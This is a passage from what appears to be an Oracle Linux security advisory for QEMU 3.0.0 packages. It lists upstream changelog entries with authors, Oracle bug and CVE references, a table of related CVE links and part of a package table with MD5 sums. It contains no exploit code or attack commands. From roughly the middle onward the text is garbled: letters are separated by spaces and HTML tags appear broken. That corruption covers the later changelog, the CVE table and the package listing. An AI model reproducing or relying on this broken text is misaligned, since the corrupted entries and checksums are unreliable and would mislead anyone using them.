hw/intc/arm_gicv3_common: Give no-migration-shift-bug subsection a needed function (Peter Maydell) \n- tcg/optimize: Do not skip default processing of dup_vec (Richard Henderson) \n- tests/acpi: update tables after memory hotplug changes (Michael S. Tsirkin) \n- pc: acpi: fix memory hotplug regression by reducing stub SRAT entry size (Igor Mammedov) \n- tests/acpi-test: update ACPI tables test blobs (Dou Liyang) \n- hw/acpi-build: Add a check for memory-less NUMA nodes (Dou Liyang) \n- vhost: check region type before casting (Tiwei Bie) \n- sam460ex: Fix PCI interrupts with multiple devices (BALATON Zoltan) \n- hw/misc/macio: Fix device introspection problems in macio devices (Thomas Huth) \n- Update version for v3.0.0-rc3 release (Peter Maydell) \n- monitor: temporary fix for dead-lock on event recursion (Marc-Andre Lureau) \n- linux-user: ppc64: dont use volatile register during safe_syscall (Shivaprasad G Bhat) \n- tests: add check_invalid_maps to test-mmap (Alex Bennee) \n- linux-user/mmap.c: handle invalid len maps correctly (Alex Bennee) \n- s390x/sclp: fix maxram calculation (Christian Borntraeger) \n- target/arm: Remove duplicate 'host' entry in '-cpu ?' output (Philippe Mathieu-Daude) \n- hw/misc/tz-mpc: Zero the LUT on initialization, not just reset (Peter Maydell) \n- hw/arm/iotkit: Fix IRQ number for timer1 (Peter Maydell) \n- armv7m_nvic: Fix m-security subsection name (Peter Maydell) \n- hw/arm/sysbus-fdt: Fix assertion in copy_properties_from_host() (Geert Uytterhoeven) \n- arm/smmuv3: Fix missing VMSD terminator (Dr. David Alan Gilbert) \n- qemu-iotests: Test query-blockstats with -drive and -blockdev (Kevin Wolf) \n- block/qapi: Include anonymous BBs in query-blockstats (Kevin Wolf) \n- block/qapi: Add 'qdev' field to query-blockstats result (Kevin Wolf) \n- file-posix: Fix write_zeroes with unmap on block devices (Kevin Wolf) \n- block: Fix documentation for BDRV_REQ_MAY_UNMAP (Kevin Wolf) \n- iotests: Add test for 'qemu-img convert -C' compatibility (Fam Zheng) \n- qemu-img: Add -C option for convert with copy offloading (Fam Zheng) \n- Revert 'qemu-img: Document copy offloading implications with -S and -c' (Fam Zheng) \n- iotests: Dont lock /dev/null in 226 (Fam Zheng) \n- docs: Describe using images in writing iotests (Fam Zheng) \n- file-posix: Handle EINTR in preallocation=full write (Fam Zheng) \n- qcow2: A grammar fix in conflicting cache sizing error message (Leonid Bloch) \n- qcow: fix a reference leak (KONRAD Frederic) \n- backends/cryptodev: remove dead code (Jay Zhou) \n- timer: remove replay clock probe in deadline calculation (Pavel Dovgalyuk) \n- i386: implement MSR_SMI_COUNT for TCG (Paolo Bonzini) \n- i386: do not migrate MSR_SMI_COUNT on machine types <2.12 (Paolo Bonzini) \n- qstring: Move qstring_from_substr()s @end one to the right (Markus Armbruster) \n- qstring: Assert size calculations dont overflow (Markus Armbruster) \n- qstring: Fix qstring_from_substr() not to provoke int overflow (liujunjie) \n- Update version for v3.0.0-rc2 release (Peter Maydell) \n- tests: fix TLS handshake failure with TLS 1.3 (Daniel P. Berrange) \n- tests: use error_abort in places expecting errors (Daniel P. Berrange) \n- tests: dont silence error reporting for all tests (Daniel P. Berrange) \n- tests: call qcrypto_init instead of gnutls_global_init (Daniel P. Berrange) \n- migration: fix duplicate initialization for expected_downtime and cleanup_bh (Lidong Chen) \n- tests: only update last_byte when at the edge (Peter Xu) \n- migration: disallow recovery for release-ram (Peter Xu) \n- migration: update recv bitmap only on dest vm (Peter Xu) \n- audio/hda: Fix migration (Dr. David Alan Gilbert) \n- migrate: Fix cancelling state warning (Dr. David Alan Gilbert) \n- migration: fix potential overflow in multifd send (Peter Xu) \n- block/file-posix: add bdrv_attach_aio_context callback for host dev and cdrom (Nishanth Aravamudan) \n- tests/tcg: remove runcom test (Alex Bennee) \n- docker: perform basic binfmt_misc validation in docker.py (Alex Bennee) \n- docker: ignore distro versioning of debootstrap (Alex Bennee) \n- docker: add commentary to debian-bootstrap.docker (Alex Bennee) \n- docker: Update debootstrap script after Debian migration from Alioth to Salsa (Philippe Mathieu-Daude) \n- docker: report hint when docker.py check fails (Alex Bennee) \n- docker: drop QEMU_TARGET check, fallback in EXECUTABLE not set (Alex Bennee) \n- docker: add expansion for docker-test-FOO to Makefile.include (Alex Bennee) \n- docker: add test-unit runner (Alex Bennee) \n- docker: Makefile.include dont include partial images (Alex Bennee) \n- docker: gracefully skip check_qemu (Alex Bennee) \n- docker: move make check into check_qemu helper (Alex Bennee) \n- docker: split configure_qemu from build_qemu (Alex Bennee) \n- docker: fail more gracefully on docker.py check (Alex Bennee) \n- docker: par down QEMU_CONFIGURE_OPTS in debian-tricore-cross (Alex Bennee) \n- docker: base debian-tricore on qemu:debian9 (Alex Bennee) \n- tests/.gitignore: dont ignore docker tests (Alex Bennee) \n- target/arm: Escalate to correct HardFault when AIRCR.BFHFNMINS is set (Peter Maydell) \n- hw/intc/arm_gicv3: Check correct HCR_EL2 bit when routing IRQ (Peter Maydell) \n- ui/cocoa.m: prevent stuck command key when going into full screen mode (John Arbuckle) \n- qga: process_event() simplification and leak fix (Marc-Andre Lureau) \n- qga-win: Handle fstrim for OSes lower than Win8 (Sameeh Jubran) \n- tcg/i386: Mark xmm registers call-clobbered (Richard Henderson) \n- i386: Rename enum CacheType members (Eduardo Habkost) \n- block/vvfat: Disable debug message by default (Thomas Huth) \n- iotests: Disallow compat=0.10 in 223 (Max Reitz) \n- iotest: Fix filtering order in 226 (Max Reitz) \n- iotests: remove LUKS support from test 226 (John Snow) \n- qemu-img: avoid overflow of min_sparse parameter (Peter Lieven) \n- block: Fix typos in comments (found by codespell) (Stefan Weil) \n- qemu-iotests: Use host_device instead of file in 149 (Kevin Wolf) \n- hw/intc/exynos4210_gic: Turn instance_init into realize function (Thomas Huth) \n- hw/arm/spitz: Move problematic nand_init() code to realize function (Thomas Huth) \n- target/arm: Correctly handle overlapping small MPU regions (Peter Maydell) \n- hw/sd/bcm2835_sdhost: Fix PIO mode writes (Guenter Roeck) \n- hw/microblaze/xlnx-zynqmp-pmu: Fix introspection problem in 'xlnx, zynqmp-pmu-soc' (Thomas Huth) \n- monitor: Fix unsafe sharing of @cur_mon among threads (Peter Xu) \n- qapi: Make 'allow-oob' optional in SchemaInfoCommand (Markus Armbruster) \n- po: Dont include comments with location (Stefan Weil) \n- linux-user/ppc: Implement swapcontext syscall (Richard Henderson) \n- linux-user: fix ELF load alignment error (Laurent Vivier) \n- tap: fix memory leak on success to create a tap device (Yunjian Wang) \n- e1000e: Prevent MSI/MSI-X storms (Jan Kiszka) \n- tcg/aarch64: limit mul_vec size (Alex Bennee) \n- spike: Fix crash when introspecting the device (Alistair Francis) \n- riscv_hart: Fix crash when introspecting the device (Alistair Francis) \n- virt: Fix crash when introspecting the device (Alistair Francis) \n- sifive_u: Fix crash when introspecting the device (Alistair Francis) \n- sifive_e: Fix crash when introspecting the device (Alistair Francis) \n- tracing: Use double-dash spelling for trace option (Yaowei Bai) \n- throttle-groups: fix hang when group member leaves (Stefan Hajnoczi) \n- s390x/cpumodel: fix segmentation fault when baselining models (David Hildenbrand) \n- Update version for v3.0.0-rc1 release (Peter Maydell) \n- Document command line options with single dash (BALATON Zoltan) \n- opts: remove redundant check for NULL parameter (Daniel P. Berrange) \n- i386: only parse the initrd_filename once for multiboot modules (Daniel P. Berrange) \n- i386: fix regression parsing multiboot initrd modules (Daniel P. Berrange) \n- hw/arm/xlnx-zynqmp: Fix crash when introspecting the 'xlnx, zynqmp' device (Thomas Huth) \n- hw/display/xlnx_dp: Move problematic code from instance_init to realize (Paolo Bonzini) \n- hw/arm/stm32f205_soc: Fix introspection problem with 'stm32f205-soc' device (Thomas Huth) \n- hw/arm/allwinner-a10: Fix introspection problem with 'allwinner-a10' (Thomas Huth) \n- hw/*/realview: Fix introspection problem with 'realview_mpcore' & 'realview_gic' (Thomas Huth) \n- hw/cpu/arm11mpcore: Fix introspection problem with 'arm11mpcore_priv' (Thomas Huth) \n- hw/arm/fsl-imx31: Fix introspection problem with the 'fsl, imx31' device (Thomas Huth) \n- hw/arm/fsl-imx25: Fix introspection problem with the 'fsl, imx25' device (Thomas Huth) \n- hw/arm/fsl-imx7: Fix introspection problems with the 'fsl, imx7' device (Thomas Huth) \n- hw/arm/fsl-imx6: Fix introspection problems with the 'fsl, imx6' device (Thomas Huth) \n- hw/cpu/a9mpcore: Fix introspection problems with the 'a9mpcore_priv' device (Thomas Huth) \n- hw/arm/msf2-soc: Fix introspection problem with the 'msf2-soc' device (Thomas Huth) \n- hw/cpu/a15mpcore: Fix introspection problem with the a15mpcore_priv device (Thomas Huth) \n- hw/arm/armv7: Fix crash when introspecting the 'iotkit' device (Thomas Huth) \n- hw/arm/bcm2836: Fix crash with device_add bcm2837 on unsupported machines (Thomas Huth) \n- hw/core/sysbus: Add a function for creating and attaching an object (Thomas Huth) \n- qom/object: Add a new function object_initialize_child() (Thomas Huth) \n- qga: fix file descriptor leak (Paolo Bonzini) \n- qga: fix 'driver' leak in guest-get-fsinfo (Marc-Andre Lureau) \n- accel/tcg: Assert that tlb fill gave us a valid TLB entry (Peter Maydell) \n- accel/tcg: Use correct test when looking in victim TLB for code (Peter Maydell) \n- bcm2835_aux: Swap RX and TX interrupt assignments (Guenter Roeck) \n- hw/arm/bcm2836: Mark the bcm2836 / bcm2837 devices with user_creatable = false (Thomas Huth) \n- hw/intc/arm_gic: Fix handling of G I C D _ I T A R G E T S R ( P e t e r M a y d e l l ) b r > - h w / i n t c / a r m _ g i c : C h e c k i n t e r r u p t n u m b e r i n g i c _ d e a c t i v a t e _ i r q ( ) ( P e t e r M a y d e l l ) b r > - a s p e e d : I m p l e m e n t w r i t e - 1 - { s e t , c l e a r } f o r A S T 2 5 0 0 s t r a p p i n g ( A n d r e w J e f f e r y ) b r > - t a r g e t / a r m : F i x L D 1 W a n d L D F F 1 W ( s c a l a r p l u s v e c t o r ) ( R i c h a r d H e n d e r s o n ) b r > - v i r t i o - s c s i : f i x h o t p l u g - > r e s e t ( ) v s e v e n t r a c e ( S t e f a n H a j n o c z i ) b r > - q d e v : a d d H o t p l u g H a n d l e r - > p o s t _ p l u g ( ) c a l l b a c k ( S t e f a n H a j n o c z i ) b r > - h w / c h a r / s e r i a l : r e t r y w r i t e i f E A G A I N ( M a r c - A n d r e L u r e a u ) b r > - P C C h i p s e t : I m p r o v e s e r i a l d i v i s o r c a l c u l a t i o n ( C a l v i n L e e ) b r > - v h o s t - u s e r - t e s t : a d d e d p r o p e r T e s t S e r v e r * d e s t i n i t i a l i z a t i o n i n t e s t _ m i g r a t e ( ) ( E m a n u e l e G i u s e p p e E s p o s i t o ) b r > - h y p e r v : e n s u r e V P i n d e x e q u a l t o Q E M U c p u _ i n d e x ( R o m a n K a g a n ) b r > - h y p e r v : r e n a m e v c p u _ i d t o v p _ i n d e x ( R o m a n K a g a n ) b r > - a c c e l : F i x t y p o a n d g r a m m a r i n c o m m e n t ( S t e f a n W e i l ) b r > - d u m p : a d d k e r n e l _ g s _ b a s e t o Q E M U C P U s t a t e ( V i k t o r P r u t y a n o v ) b r > - m o n i t o r : F i x t r a c e p o i n t c r a s h o n J S O N s y n t a x e r r o r ( M a r k u s A r m b r u s t e r ) b r > - M A I N T A I N E R S : N e w s e c t i o n ' I n c o m p a t i b l e c h a n g e s ' , c o p y l i b v i r - l i s t ( M a r k u s A r m b r u s t e r ) b r > - q e m u - d o c : M o v e a p p e n d i x ' D e p r e c a t e d f e a t u r e s ' t o i t s o w n f i l e ( M a r k u s A r m b r u s t e r ) b r > - c l i q m p : M a r k - - p r e c o n f i g , e x i t - p r e c o n f i g e x p e r i m e n t a l ( M a r k u s A r m b r u s t e r ) b r > - q a p i : D o n o t e x p o s e ' a l l o w - p r e c o n f i g ' i n q u e r y - q m p - s c h e m a ( M a r k u s A r m b r u s t e r ) b r > - s m 5 0 1 : F i x w a r n i n g a b o u t u n r e a c h a b l e c o d e ( B A L A T O N Z o l t a n ) b r > - s a m 4 6 0 e x : C o r r e c t u s e a f t e r f r e e e r r o r ( B A L A T O N Z o l t a n ) b r > - e t s e c : f i x I R Q ( u n ) m a s k i n g ( M i c h a e l D a v i d s a v e r ) b r > - p p c / x i c s : f i x I C P r e s e t p a t h ( G r e g K u r z ) b r > - s p a p r : C o r r e c t i n v e r t e d t e s t i n s p a p r _ p c _ d i m m _ n o d e ( ) ( D a v i d G i b s o n ) b r > - s m 5 0 1 : U p d a t e s c r e e n o n f r a m e b u f f e r a d d r e s s c h a n g e ( B A L A T O N Z o l t a n ) b r > - Z e r o o u t t h e h o s t s ' m s g _ c o n t r o l ' b u f f e r ( J o n a s S c h i e v i n k ) b r > - l i n u x - u s e r : f i x m m a p _ f i n d _ v m a _ r e s e r v e d ( ) ( L a u r e n t V i v i e r ) b r > - l i n u x - u s e r : c o n v e r t r e m a i n i n g f c n t l ( ) t o s a f e _ f c n t l ( ) ( L a u r e n t V i v i e r ) b r > - l i n u x - u s e r : p p c 6 4 : u s e t h e c o r r e c t v a l u e s f o r F _ * L K 6 4 s ( S h i v a p r a s a d G B h a t ) b r > - d o c s : G r a m m a r a n d s p e l l i n g f i x e s ( V i l l e S k y t t e ) b r > - q e m u - i m g : a l i g n r e s u l t o f i s _ a l l o c a t e d _ s e c t o r s ( P e t e r L i e v e n ) b r > - s c s i - d i s k : B l o c k D e v i c e C h a r a c t e r i s t i c s e m u l a t i o n f i x ( D a n i e l H e n r i q u e B a r b o z a ) b r > - i o t e s t s : a d d t e s t 2 2 6 f o r f i l e d r i v e r t y p e s ( J o h n S n o w ) b r > - f i l e - p o s i x : s p e c i f y e x p e c t e d f i l e t y p e s ( J o h n S n o w ) b r > - i o t e s t s : n b d : S t o p q e m u - n b d b e f o r e r e m a k i n g i m a g e ( F a m Z h e n g ) b r > - i o t e s t s : 1 5 3 : F i x d e a d c o d e ( F a m Z h e n g ) b r > - u i / c o c o a . m : r e p l a c e s c r o l l i n g D e l t a Y w i t h d e l t a Y ( J o h n A r b u c k l e ) b r > - s e c c o m p : a l l o w s c h e d _ s e t s c h e d u l e r ( ) w i t h S C H E D _ I D L E p o l i c y ( M a r c - A n d r e L u r e a u ) b r > - v f i o / p c i : d o n o t s e t t h e P C I D e v i c e ' h a s _ r o m ' a t t r i b u t e ( C e d r i c L e G o a t e r ) b r > - m o n i t o r : f i x d o u b l e - f r e e o f r e q u e s t e r r o r ( M a r c - A n d r e L u r e a u ) b r > - e r r o r : R e m o v e N U L L c h e c k s o n e r r o r _ p r o p a g a t e ( ) c a l l s ( P h i l i p p e M a t h i e u - D a u d e ) b r > - s 3 9 0 x / s t o r a g e a t t r i b u t e s : f i x C M M A _ B L O C K _ S I Z E u s a g e ( C l a u d i o I m b r e n d a ) b r > b r > [ 1 2 : 2 . 1 1 . 1 - 2 . e l 7 ] b r > - h w / a c p i - b u i l d : b u i l d S R A T m e m o r y a f f i n i t y s t r u c t u r e s f o r D I M M d e v i c e s ( H a o z h o n g Z h a n g ) [ O r a b u g : 2 7 5 0 9 7 5 3 ] b r > - q m p : d i s t i n g u i s h P C - D I M M a n d N V D I M M i n M e m o r y D e v i c e I n f o L i s t ( H a o z h o n g Z h a n g ) [ O r a b u g : 2 7 5 0 9 7 5 3 ] b r > - p c - d i m m : m a k e q m p _ p c _ d i m m _ d e v i c e _ l i s t ( ) s o r t d e v i c e s b y a d d r e s s ( H a o z h o n g Z h a n g ) [ O r a b u g : 2 7 5 0 9 7 5 3 ] b r > - n v d i m m : a d d a m a c r o f o r p r o p e r t y ' l a b e l - s i z e ' ( H a o z h o n g Z h a n g ) [ O r a b u g : 2 7 5 0 9 7 5 3 ] b r > - n v d i m m : a d d ' u n a r m e d ' o p t i o n ( H a o z h o n g Z h a n g ) [ O r a b u g : 2 7 5 0 9 7 5 3 ] b r > - b l o c k : F i x N U L L d e r e f e r e n c e o n e m p t y d r i v e e r r o r ( K e v i n W o l f ) [ O r a b u g : 2 7 8 3 2 1 0 6 ] b r > - R e v e r t ' I D E : D o n o t f l u s h e m p t y C D R O M d r i v e s ' ( S t e f a n H a j n o c z i ) [ O r a b u g : 2 7 8 3 2 1 0 6 ] b r > - b l o c k : t e s t b l k _ a i o _ f l u s h ( ) w i t h b l k - > r o o t = = N U L L ( K e v i n W o l f ) [ O r a b u g : 2 7 8 3 2 1 0 6 ] b r > - b l o c k : a d d B l o c k B a c k e n d - > i n _ f l i g h t c o u n t e r ( S t e f a n H a j n o c z i ) [ O r a b u g : 2 7 8 3 2 1 0 6 ] b r > - b l o c k : e x t r a c t A I O _ W A I T _ W H I L E ( ) f r o m B l o c k D r i v e r S t a t e ( S t e f a n H a j n o c z i ) [ O r a b u g : 2 7 8 3 2 1 0 6 ] b r > - a i o : r e n a m e a i o _ c o n t e x t _ i n _ i o t h r e a d ( ) t o i n _ a i o _ c o n t e x t _ h o m e _ t h r e a d ( ) ( S t e f a n H a j n o c z i ) [ O r a b u g : 2 7 8 3 2 1 0 6 ] b r > - q e m u . s p e c : A d d d e p e n d e n c y f o r l i b i s c s i 1 . 9 . 0 - 8 ( M a r k K a n d a ) [ O r a b u g : 2 7 8 3 2 3 0 0 ] b r > - m u l t i b o o t . c : D o c u m e n t a s f i x e d a g a i n s t C V E - 2 0 1 8 - 7 5 5 0 ( J a c k S c h w a r t z ) [ O r a b u g : 2 7 8 3 2 3 3 2 ] { C V E - 2 0 1 8 - 7 5 5 0 } b r > - C V E - 2 0 1 7 - 1 8 0 3 0 : c i r r u s _ i n v a l i d a t e _ r e g i o n ( ) l e t s p r i v g u e s t u s e r c a u s e D o S ( M a r k K a n d a ) [ O r a b u g : 2 7 8 3 2 3 1 9 ] { C V E - 2 0 1 7 - 1 8 0 3 0 } b r > - v g a : f i x r e g i o n c a l c u l a t i o n ( G e r d H o f f m a n n ) [ O r a b u g : 2 7 8 3 2 3 0 9 ] { C V E - 2 0 1 8 - 7 8 5 8 } b r > - k e y m a p : u s e g l i b h a s h f o r k b d _ l a y o u t _ t ( G e r d H o f f m a n n ) [ O r a b u g : 2 7 6 6 3 7 9 5 ] b r > - q e m u . s p e c : E n a b l e c o r o u t i n e p o o l a n d v h o s t - v s o c k ( K a r l H e u b a u m ) [ O r a b u g : 2 7 8 3 2 3 3 7 ] b r > b r > [ 1 2 : 2 . 1 1 . 1 - 1 . e l 7 ] b r > - B U I L D I N F O : c o m m i t = 9 f c 0 f 7 0 c 8 3 d 6 d e 5 6 6 7 c 4 5 c d 1 e 4 2 0 a 0 8 0 e 7 5 c 7 d 0 4 b r > - U p d a t e q e m u . s p e c v e r s i o n f o r 2 . 1 1 . 1 / p > \n \n \n b r > h 2 > R e l a t e d C V E s / h 2 > \n b r > t a b l e c e l l p a d d i n g = \" 2 \" c e l l s p a c i n g = \" 2 \" b o r d e r = \" 0 \" w i d t h = \" 1 0 0 % \" > t b o d y > \n t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 5 7 1 5 . h t m l \" > C V E - 2 0 1 7 - 5 7 1 5 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 5 7 5 3 . h t m l \" > C V E - 2 0 1 7 - 5 7 5 3 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 5 7 5 4 . h t m l \" > C V E - 2 0 1 7 - 5 7 5 4 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 5 6 8 3 . h t m l \" > C V E - 2 0 1 8 - 5 6 8 3 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 3 6 7 2 . h t m l \" > C V E - 2 0 1 7 - 1 3 6 7 2 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 3 7 1 1 . h t m l \" > C V E - 2 0 1 7 - 1 3 7 1 1 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 5 1 2 4 . h t m l \" > C V E - 2 0 1 7 - 1 5 1 2 4 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 5 2 6 8 . h t m l \" > C V E - 2 0 1 7 - 1 5 2 6 8 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 7 8 5 8 . h t m l \" > C V E - 2 0 1 8 - 7 8 5 8 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 3 6 3 9 . h t m l \" > C V E - 2 0 1 8 - 3 6 3 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 4 1 6 7 . h t m l \" > C V E - 2 0 1 7 - 1 4 1 6 7 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 5 2 8 9 . h t m l \" > C V E - 2 0 1 7 - 1 5 2 8 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 2 6 3 3 . h t m l \" > C V E - 2 0 1 7 - 2 6 3 3 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 7 5 5 0 . h t m l \" > C V E - 2 0 1 8 - 7 5 5 0 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 1 1 8 0 6 . h t m l \" > C V E - 2 0 1 8 - 1 1 8 0 6 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 1 5 7 4 6 . h t m l \" > C V E - 2 0 1 8 - 1 5 7 4 6 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 1 7 9 6 3 . h t m l \" > C V E - 2 0 1 8 - 1 7 9 6 3 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 1 7 9 6 2 . h t m l \" > C V E - 2 0 1 8 - 1 7 9 6 2 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 1 7 9 5 8 . h t m l \" > C V E - 2 0 1 8 - 1 7 9 5 8 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 1 0 8 3 9 . h t m l \" > C V E - 2 0 1 8 - 1 0 8 3 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 8 - 1 2 6 1 7 . h t m l \" > C V E - 2 0 1 8 - 1 2 6 1 7 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 7 4 7 1 . h t m l \" > C V E - 2 0 1 7 - 7 4 7 1 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 2 6 3 0 . h t m l \" > C V E - 2 0 1 7 - 2 6 3 0 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 0 8 0 6 . h t m l \" > C V E - 2 0 1 7 - 1 0 8 0 6 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 1 3 3 4 . h t m l \" > C V E - 2 0 1 7 - 1 1 3 3 4 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 7 3 8 1 . h t m l \" > C V E - 2 0 1 7 - 1 7 3 8 1 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 7 4 9 3 . h t m l \" > C V E - 2 0 1 7 - 7 4 9 3 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 8 1 1 2 . h t m l \" > C V E - 2 0 1 7 - 8 1 1 2 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 9 5 0 3 . h t m l \" > C V E - 2 0 1 7 - 9 5 0 3 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 2 8 0 9 . h t m l \" > C V E - 2 0 1 7 - 1 2 8 0 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 3 6 7 . h t m l \" > C V E - 2 0 1 7 - 1 3 6 7 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 5 0 3 8 . h t m l \" > C V E - 2 0 1 7 - 1 5 0 3 8 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 5 1 1 9 . h t m l \" > C V E - 2 0 1 7 - 1 5 1 1 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 6 8 4 5 . h t m l \" > C V E - 2 0 1 7 - 1 6 8 4 5 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 8 0 3 0 . h t m l \" > C V E - 2 0 1 7 - 1 8 0 3 0 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 1 8 0 4 3 . h t m l \" > C V E - 2 0 1 7 - 1 8 0 4 3 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 8 3 0 9 . h t m l \" > C V E - 2 0 1 7 - 8 3 0 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 8 3 7 9 . h t m l \" > C V E - 2 0 1 7 - 8 3 7 9 / a > / t d > / t r > t r > t d > a h r e f = \" h t t p : / / l i n u x . o r a c l e . c o m / c v e / C V E - 2 0 1 7 - 8 3 8 0 . h t m l \" > C V E - 2 0 1 7 - 8 3 8 0 / a > / t d > / t r > \n / t b o d y > / t a b l e > \n \n b r > h 2 > U p d a t e d P a c k a g e s / h 2 > \n b r > t a b l e c e l l p a d d i n g = \" 2 \" c e l l s p a c i n g = \" 2 \" b o r d e r = \" 0 \" w i d t h = \" 1 0 0 % \" > t b o d y > \n t r s t y l e = \" c o l o r : # F F 0 0 0 0 ; \" > t d > b > R e l e a s e / A r c h i t e c t u r e / b > t d > b > F i l e n a m e / b > / t d > t d > b > M D 5 s u m / b > / t d > t d > b > S u p e r s e d e d B y A d v i s o r y / b > / t d > / t r > \n t r > t d c o l s p a n = \" 4 \" > / t d > / t r > t r > t d > O r a c l e L i n u x 7 ( a a r c h 6 4 ) / t d > t d > q e m u - 3 . 0 . 0 - 1 . e l 7 . s r c . r p m / t d > t d > 6 0 0 a b 7 a 2 5 2 5 0 5 7 e 7 b 8 4 a a 5 e 3 4 5 4 a 9 c 8 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > i v s h m e m - t o o l s - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > 3 9 7 a 1 e c 3 2 5 d c 3 e d 3 3 9 9 6 8 7 b 6 e 0 5 0 6 d 2 4 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > b 9 c 4 e 0 b 3 a 9 6 c 3 a 9 0 0 3 a 7 6 0 8 8 9 5 2 8 d b 4 6 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - b l o c k - g l u s t e r - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > 7 f 5 5 2 9 b d b e f d b d 1 3 6 d a d 1 d 8 8 2 3 1 5 8 b b 5 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - b l o c k - i s c s i - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > 4 3 5 8 c 6 3 4 b e b 7 f f 1 3 9 0 b a d a 4 c 7 a 2 8 a 4 e 7 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - b l o c k - r b d - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > 6 6 2 b b a 1 b 1 0 1 1 d d c f 0 2 e c 2 e 9 2 9 0 0 9 b 8 a d / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t 